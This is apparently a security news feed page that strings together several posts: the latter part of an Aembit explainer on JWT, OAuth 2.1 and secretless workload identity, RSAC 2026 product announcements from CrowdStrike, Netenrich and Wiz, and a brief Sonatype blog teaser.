Connect</a> (OIDC), an identity layer built on top of OAuth 2.0, adds authentication by issuing ID tokens as JWTs that contain verified claims about the authenticated entity.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">A typical workload authentication flow using both protocols:</p> <ol class="[li_&amp;]:mb-0 [li_&amp;]:mt-1 [li_&amp;]:gap-1 [&amp;:not(:last-child)_ul]:pb-1 [&amp;:not(:last-child)_ol]:pb-1 list-decimal flex flex-col gap-1 pl-8 mb-3"> <li class="whitespace-normal break-words pl-2">A service needs access to a protected resource and authenticates to the OAuth authorization server using the client credentials flow.</li> <li class="whitespace-normal break-words pl-2">The authorization server validates the credentials, evaluates access policies and issues a JWT access token containing the authorized scopes and claims.</li> <li class="whitespace-normal break-words pl-2">The service presents this JWT to the resource server, which validates the signature and claims before granting access.</li> </ol> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">This pairing works because OAuth handles the complexity of token issuance and lifecycle management while JWT enables the resource server to validate tokens locally without calling back to the authorization server on every request. In distributed systems with hundreds of microservices, that local validation eliminates a network round trip on every API call.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The confusion between JWT and OAuth often stems from their overlapping presence in this flow. When engineers refer to “OAuth authentication,” they are usually describing OAuth authorization combined with token-based identity verification using JWTs issued through OIDC. Recognizing that distinction prevents architectural mistakes like using raw JWTs for authorization decisions without an OAuth framework to manage their lifecycle.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">OAuth 2.1 and Workload Authentication</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">OAuth 2.1 consolidates years of security lessons into a single specification (currently in late-stage IETF draft, not yet published as a final RFC, but widely adopted by major authorization servers). It deprecates the implicit flow and resource owner password credentials flow, requires PKCE for all authorization code flows, requires refresh tokens for public clients to be either sender-constrained or one-time use (making rotation the standard implementation in practice) and recommends sender-constrained tokens through mutual TLS. For workload and machine-to-machine use cases, OAuth 2.1 standardizes how client credentials are exchanged, how access tokens are scoped and how token exchange (RFC 8693) works across environments. Emerging frameworks for AI agent interoperability, including the Model Context Protocol (MCP), depend on these principles. OAuth 2.1 enables standardized authorization between agents, services and APIs using short-lived, verifiable JWTs without persistent secrets.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Applying OAuth and JWT to workloads introduces challenges that do not exist in human authentication. Humans can use MFA, push notifications and browser logins. Workloads cannot. They rely on certificates, attestation or tokens, which means the traditional OAuth client credentials approach of storing a client secret in a container image or environment variable creates a persistent attack vector.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Attestation-based authentication addresses this by eliminating long-lived secrets entirely. Instead of managing stored credentials, workloads authenticate using cryptographically verifiable identity claims about their runtime environment: the cloud instance they run on, the Kubernetes namespace they belong to, the security posture of their host. The authorization server validates these claims and issues short-lived JWTs scoped to the specific resources the workload needs. The workload never handles a persistent secret, and the JWT expires after a brief window, limiting exposure if intercepted. For multicloud and hybrid environments, <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/what-identity-federation-means-for-workloads-in-cloud-native-environments/">workload identity federation</a> extends this model across cloud boundaries. A workload in one cloud presents its cryptographically signed identity token, which the target authorization server validates and exchanges for a new JWT scoped to local resources. This eliminates the need to provision duplicate service accounts across clouds while maintaining the same <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/secrets-management-vs-access-management-what-you-need-to-know/">secretless security model</a>.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Choosing the Right Approach for Your Architecture</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">The right implementation depends on how many clouds you operate in, whether you can modify application code and how much credential management overhead you can absorb. Each pattern below applies OAuth and JWT differently based on those constraints.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Single Cloud, Single Identity Provider</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Use cloud-native managed identities. AWS IAM roles, Azure Managed Identities and GCP Service Accounts implement OAuth and JWT internally while eliminating credential storage. Your application authenticates through the cloud’s metadata service and receives JWT access tokens without managing secrets. Kubernetes ServiceAccounts provide pod-level identity within a cluster and can be projected as OIDC tokens for federation with cloud IAM. This approach works well within a single cloud but requires federation for cross-cloud access.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Multicloud or Hybrid Environments</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Implement workload identity federation with centralized policy. Use OAuth 2.0 token exchange (RFC 8693) to enable workloads in one cloud to access resources in another. A workload presents its home-cloud JWT, which the target authorization server validates and exchanges for a new JWT scoped to local resources. This requires a federation platform that can validate tokens from multiple issuers and enforce consistent policy across clouds. The benefit is that you avoid provisioning duplicate service accounts and managing separate credential stores in each cloud. A single identity assertion, verified cryptographically, grants access across trust boundaries.</p> <h3 class="text-text-100 mt-2 -mb-1 text-base font-bold">Legacy Applications Without Code Changes</h3> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">Use a broker or proxy pattern. A proxy intercepts outgoing requests from a microservice, handles OAuth flows, JWT validation, token refresh and credential injection transparently. The application makes standard HTTP requests without any awareness that the proxy is managing authentication. This pattern is particularly useful for AI agent and <a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/mcp-authentication-and-authorization-patterns/">MCP integrations</a> where modifying the application code is not practical.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Where to Start</h2> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">If you are evaluating JWT vs. OAuth for a new project, start by clarifying what problem you are solving. If you need to package signed claims for stateless validation, JWT is the format. If you need to delegate and control access across services, OAuth is the framework. Most production systems need both: OAuth to manage the authorization lifecycle and JWT to carry the resulting access information.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]">For workload authentication, the priority is eliminating static credentials. Every client secret stored in an environment variable or config file is a credential that can be leaked, stolen or reused. Moving to attestation-based authentication with short-lived JWTs issued through OAuth flows removes that attack vector entirely. Start by auditing which workloads still rely on long-lived client secrets and identify which can be migrated to identity federation or managed identities.</p> <p class="font-claude-response-body break-words whitespace-normal leading-[1.7]"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/product-overview/">Aembit</a> implements this model at scale. The platform uses environment attestation to prove workload identity through the OAuth 2.0 client credentials flow with cryptographic verification rather than traditional client secrets, then issues short-lived JWT access tokens with automatic refresh. The platform handles cross-cloud federation, conditional access policies and transparent credential injection so that developers never write authentication code.</p> <h2 class="text-text-100 mt-3 -mb-1 text-[1.125rem] font-bold">Related Reading</h2> <ul class="[li_&amp;]:mb-0 [li_&amp;]:mt-1 [li_&amp;]:gap-1 [&amp;:not(:last-child)_ul]:pb-1 [&amp;:not(:last-child)_ol]:pb-1 list-disc flex flex-col gap-1 pl-8 mb-3"> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/dynamic-authorization-vs-static-secrets-rethinking-cloud-access-controls/">Dynamic Authorization vs. Static Secrets</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/frictionless-devops-identity-management/">Frictionless Security: What DevOps Teams Really Need</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/the-what-where-and-why-of-workload-identity-and-access-management/">The What, Where, and Why of Workload IAM</a></li> <li class="whitespace-normal break-words pl-2"><a class="underline underline underline-offset-2 decoration-1 decoration-current/40 hover:decoration-current focus:decoration-current" href="https://aembit.io/blog/aembit-adds-aws-workload-identity-federation-wif-support/">Aembit Adds AWS Workload Identity Federation Support</a></li> </ul></div> </div> </div> </div> </div><p>The post <a href="https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/">The Trivy Compromise: The Fallacy of Secrets Management and the Case for Workload Identity</a> appeared first on <a href="https://aembit.io/">Aembit</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/" data-a2a-title="The Trivy Compromise: The Fallacy of Secrets Management and the Case for Workload Identity"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthe-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity%2F&amp;linkname=The%20Trivy%20Compromise%3A%20The%20Fallacy%20of%20Secrets%20Management%20and%20the%20Case%20for%20Workload%20Identity" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthe-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity%2F&amp;linkname=The%20Trivy%20Compromise%3A%20The%20Fallacy%20of%20Secrets%20Management%20and%20the%20Case%20for%20Workload%20Identity" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthe-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity%2F&amp;linkname=The%20Trivy%20Compromise%3A%20The%20Fallacy%20of%20Secrets%20Management%20and%20the%20Case%20for%20Workload%20Identity" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthe-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity%2F&amp;linkname=The%20Trivy%20Compromise%3A%20The%20Fallacy%20of%20Secrets%20Management%20and%20the%20Case%20for%20Workload%20Identity" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fthe-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity%2F&amp;linkname=The%20Trivy%20Compromise%3A%20The%20Fallacy%20of%20Secrets%20Management%20and%20the%20Case%20for%20Workload%20Identity" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://aembit.io/">Aembit</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Apurva Dave">Apurva Dave</a>. Read the original post at: <a href="https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/">https://aembit.io/blog/the-trivy-compromise-the-fallacy-of-secrets-management-and-the-case-for-workload-identity/</a> </p>

<p>SAN FRANCISCO – As autonomous artificial intelligence (AI) agents begin to operate with system-level privileges across global enterprises, CrowdStrike Inc. has massively expanded its Falcon platform, positioning the endpoint as the critical frontline for AI governance.</p><p>The announcement at RSAC here signals a strategic shift in how organizations defend against agentic workflows that can independently execute commands, access sensitive data, and modify files. Unlike static applications, autonomous agents often perform actions that are indistinguishable from legitimate human activity, rendering traditional network controls obsolete.</p><p>CrowdStrike’s new capabilities address the Shadow AI crisis. The company revealed its sensors have detected over 1,800 distinct AI applications — totaling nearly 160 million instances — running across its customer base.</p><p>To manage this sprawl, the updated Falcon platform introduces AI Runtime Protection, real-time visibility into the scripts and commands executed by AI agents, allowing security teams to isolate compromised endpoints instantly; AI Data Detection and Response (AIDR), protection extended to the prompt layer of popular tools like ChatGPT, Claude, and Microsoft Copilot to prevent data leaks and injection attacks; and Cross-Surface Governance, which tracks AI behavior across browsers, SaaS platforms like Salesforce Inc.’s Agentforce, and cloud-native container environments.</p><p>“Security built for static applications can’t keep up with autonomous systems,” CrowdStrike President Michael Sentonas said. “Organizations need real-time visibility and control over AI behavior wherever it runs.”</p><p>In a move to accelerate the phase-out of legacy Security Information and Event Management (SIEM) systems, CrowdStrike also announced that its Falcon Next-Gen SIEM can now ingest and correlate telemetry from Microsoft Defender for Endpoint.</p><p>Integration allows organizations using Microsoft’s security tools to modernize their operations within the CrowdStrike ecosystem without the operational burden of deploying new sensors. The collaboration highlights a maturing industry focusing on interoperability.</p><p>“It is great to see Microsoft Defender telemetry being leveraged within Falcon Next-Gen SIEM,” said Rob Lefferts, corporate vice president for threat protection at Microsoft. “Integrations like this reinforce the importance of an open ecosystem.”</p><p>By unifying AI discovery, data flow monitoring, and third-party telemetry, CrowdStrike is attempting to close the widening gap between rapid AI adoption and security enforcement. As AI moves from a chat box to an autonomous worker, the endpoint is no longer just a device but the epicenter of the new digital perimeter.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/crowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai/" data-a2a-title="CrowdStrike Redefines Cybersecurity Architecture for Autonomous AI"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcrowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai%2F&amp;linkname=CrowdStrike%20Redefines%20Cybersecurity%20Architecture%20for%20Autonomous%20AI" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcrowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai%2F&amp;linkname=CrowdStrike%20Redefines%20Cybersecurity%20Architecture%20for%20Autonomous%20AI" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcrowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai%2F&amp;linkname=CrowdStrike%20Redefines%20Cybersecurity%20Architecture%20for%20Autonomous%20AI" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcrowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai%2F&amp;linkname=CrowdStrike%20Redefines%20Cybersecurity%20Architecture%20for%20Autonomous%20AI" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcrowdstrike-redefines-cybersecurity-architecture-for-autonomous-ai%2F&amp;linkname=CrowdStrike%20Redefines%20Cybersecurity%20Architecture%20for%20Autonomous%20AI" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>Netenrich launched Cyber Risk Operations at RSAC 2026 Monday, a new operating model powered by its Resolution Intelligence Cloud platform that aims to move enterprise security from reactive alert management toward continuous validation of control effectiveness.</p><p>The offering targets CIOs, CTOs, and CISOs who are jointly accountable for enterprise security posture. Netenrich’s central argument is that the dominant alert-centric approach, whether MDR, XDR, or AI-enhanced SOC, optimizes for speed of alert processing without actually reducing an organization’s exposure.</p><p>“The industry has spent the last decade building ‘Alert Factories’ that optimize for speed and automation but fail to reduce actual exposure,” said Raju Chekuri, CEO of Netenrich. “Innovative CISOs know that green dashboards often mask ghost assets and silent failures. With Cyber Risk Operations, we are moving the market from reactive firefighting to predictive resistance.”</p><p>The platform is built on Google SecOps and uses Netenrich’s ACT Framework, covering attack surface, controls, and threats. Key capabilities include situational awareness that goes beyond generic threat intel to provide specific risk context, adaptive defense that automatically tracks ephemeral assets like containers that can go unmonitored for their entire lifecycle, and measurable efficacy outcomes using a Likelihood, Impact, Confidence scoring model. Netenrich cites data suggesting up to 18% of critical infrastructure goes unmonitored due to the “ghost asset” problem.</p><p>The service shifts reporting metrics from activity, such as tickets closed, to outcomes, measured as actual risk reduction. Resolution Intelligence Cloud also leverages agentic AI to bridge risk assessment and security operations.</p><p>Leading enterprises are already using the platform. Nuvama Group’s CTO, Harsh Jha, said the company deployed Resolution Intelligence Cloud as its analytics platform on top of Google SecOps to strengthen its security posture with data-driven execution.</p><p>Netenrich is partnering with GuidePoint Security for go-to-market distribution. Cyber Risk Operations is available immediately.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/netenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models/" data-a2a-title="Netenrich Launches Cyber Risk Operations to Replace Alert-Centric Security Models"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fnetenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models%2F&amp;linkname=Netenrich%20Launches%20Cyber%20Risk%20Operations%20to%20Replace%20Alert-Centric%20Security%20Models" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fnetenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models%2F&amp;linkname=Netenrich%20Launches%20Cyber%20Risk%20Operations%20to%20Replace%20Alert-Centric%20Security%20Models" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fnetenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models%2F&amp;linkname=Netenrich%20Launches%20Cyber%20Risk%20Operations%20to%20Replace%20Alert-Centric%20Security%20Models" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fnetenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models%2F&amp;linkname=Netenrich%20Launches%20Cyber%20Risk%20Operations%20to%20Replace%20Alert-Centric%20Security%20Models" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fnetenrich-launches-cyber-risk-operations-to-replace-alert-centric-security-models%2F&amp;linkname=Netenrich%20Launches%20Cyber%20Risk%20Operations%20to%20Replace%20Alert-Centric%20Security%20Models" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<p>SAN FRANCISCO – Security specialist Wiz (now part of Google Cloud) on Monday announced the AI Application Protection Platform (AI-APP), a solution designed to secure the increasingly complex web of models, AI agents, and data that define artificial intelligence (AI)-native development.</p><p>The move, announced at RSAC 2026, marks a significant evolution in the Cloud-Native Application Protection Platform (CNAPP) market. While traditional security tools often analyze infrastructure, identities, and applications in silos, Wiz’s new platform treats AI as a dynamic, interconnected system.</p><p>According to Wiz, the “blind spots” created by rapid AI adoption are a primary concern for CISOs. Organizations are currently juggling managed services like AWS Bedrock, SaaS ecosystems like Microsoft Copilot, and custom self-hosted frameworks.</p><p>The AI-APP addresses this by building a comprehensive inventory across all environments. A central feature, the Wiz Workload Explainer, leverages AI to scan and translate custom implementations into clear components—identifying agents and data flows that traditional deterministic scanning often misses.</p><p>The core philosophy of the new platform is that AI risk is rarely the result of a single vulnerability. Instead, risk emerges when benign conditions across different layers overlap.</p><p>“AI risk is not defined by a single issue, but by how multiple conditions come together,” the company said in a <a href="https://www.wiz.io/blog/introducing-wiz-ai-app">blog post</a>. By correlating signals across the application stack, Wiz can map real, exploitable attack paths. For example, the platform can identify if an AI agent has the permissions to execute code or modify infrastructure—actions that, if manipulated, could lead to catastrophic breaches.</p><p>To help teams prioritize these threats, Wiz maps identified risks against the OWASP Top 10 for LLM Applications, ensuring security teams focus on vulnerabilities like prompt injection and data leakage within a recognized compliance framework.</p><p>The platform introduces a triple-layer threat detection strategy: Model Activity, for monitoring inputs/outputs and prompt behavior; Workload Execution, to track agent activity and tool usage; and Cloud Layer, which observes API calls and identity changes.</p><p>To bolster this defense, Wiz has integrated with key partners in the Wiz Integration Network (WIN). Collaborations with Cloudflare, TrojAI, and Pillar Security allow the platform to ingest external red-teaming findings and endpoint security data, providing a “single pane of glass” for AI security.</p><p>Separately, Wiz unveiled Red Agent, an AI-powered attacker<strong> </strong>that acts as a sophisticated security researcher, but with AI speed and scale.</p><p>The Red Agent joins Wiz’s Green and Blue Agents to power agentic workflows that allow teams to operate how AI operates within their environment.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/wiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk/" data-a2a-title="Wiz Launches AI-APP to Tackle ‘New Anatomy’ of Cyber Risk"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk%2F&amp;linkname=Wiz%20Launches%20AI-APP%20to%20Tackle%20%E2%80%98New%20Anatomy%E2%80%99%20of%20Cyber%20Risk" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk%2F&amp;linkname=Wiz%20Launches%20AI-APP%20to%20Tackle%20%E2%80%98New%20Anatomy%E2%80%99%20of%20Cyber%20Risk" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk%2F&amp;linkname=Wiz%20Launches%20AI-APP%20to%20Tackle%20%E2%80%98New%20Anatomy%E2%80%99%20of%20Cyber%20Risk" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk%2F&amp;linkname=Wiz%20Launches%20AI-APP%20to%20Tackle%20%E2%80%98New%20Anatomy%E2%80%99%20of%20Cyber%20Risk" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fwiz-launches-ai-app-to-tackle-new-anatomy-of-cyber-risk%2F&amp;linkname=Wiz%20Launches%20AI-APP%20to%20Tackle%20%E2%80%98New%20Anatomy%E2%80%99%20of%20Cyber%20Risk" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div>

<div class="hs-featured-image-wrapper"> <a href="https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds" title="" class="hs-featured-image-link"> <img decoding="async" src="https://www.sonatype.com/hubfs/blog_golden_pull_requests.jpg" alt="Image of hexagon icon alongside text spelling out Sonatype Lifecycle" class="hs-featured-image" style="width:auto !important; max-width:50%; float:left; margin:0 15px 15px 0;"> </a> </div><p>Modern software developme<span style="text-decoration: none;">nt </span><a href="https://www.sonatype.com/state-of-the-software-supply-chain/2026/software-infrastructure-growth" style="text-decoration: none;"><span style="color: #1155cc;">runs on open source</span></a>. Nearly every application is built from a combination of third-party components, transitive <a href="https://www.sonatype.com/blog/software-dependencies-a-beginners-guide" style="text-decoration: none;"><span style="color: #1155cc;">dependencies</span></a>, and rapidly evolving package ecosystems.</p><p><img decoding="async" src="https://track.hubspot.com/__ptq.gif?a=1958393&amp;k=14&amp;r=https%3A%2F%2Fwww.sonatype.com%2Fblog%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds&amp;bu=https%253A%252F%252Fwww.sonatype.com%252Fblog&amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "></p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/golden-pull-requests-automating-trusted-remediation-without-breaking-builds/" data-a2a-title="Golden Pull Requests: Automating Trusted Remediation Without Breaking Builds"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds%2F&amp;linkname=Golden%20Pull%20Requests%3A%20Automating%20Trusted%20Remediation%20Without%20Breaking%20Builds" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds%2F&amp;linkname=Golden%20Pull%20Requests%3A%20Automating%20Trusted%20Remediation%20Without%20Breaking%20Builds" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds%2F&amp;linkname=Golden%20Pull%20Requests%3A%20Automating%20Trusted%20Remediation%20Without%20Breaking%20Builds" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds%2F&amp;linkname=Golden%20Pull%20Requests%3A%20Automating%20Trusted%20Remediation%20Without%20Breaking%20Builds" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fgolden-pull-requests-automating-trusted-remediation-without-breaking-builds%2F&amp;linkname=Golden%20Pull%20Requests%3A%20Automating%20Trusted%20Remediation%20Without%20Breaking%20Builds" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.sonatype.com/blog">2024 Sonatype Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Aaron Linskens">Aaron Linskens</a>. Read the original post at: <a href="https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds">https://www.sonatype.com/blog/golden-pull-requests-automating-trusted-remediation-without-breaking-builds</a> </p>

<figure class=" sqs-block-image-figure intrinsic "> <p> <a class=" sqs-block-image-link " href="https://xkcd.com/3210/"></a></p> <p> <img data-stretch="false" data-image="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png" data-image-dimensions="675x349" data-image-focal-point="0.5,0.5" alt="" data-load="false" elementtiming="system-image-block" src="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=1000w" width="675" height="349" sizes="auto, (max-width: 640px) 100vw, (max-width: 767px) 100vw, 100vw" onload='this.classList.add("loaded")' srcset="https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=100w 100w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=300w 300w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=500w 500w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=750w 750w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=1000w 1000w, https://images.squarespace-cdn.com/content/v1/5355d604e4b03c3e9896e131/b265741e-026f-4feb-86cc-bbbf6c1d465e/eliminating_the_impossible.png?format=1500w 1500w, 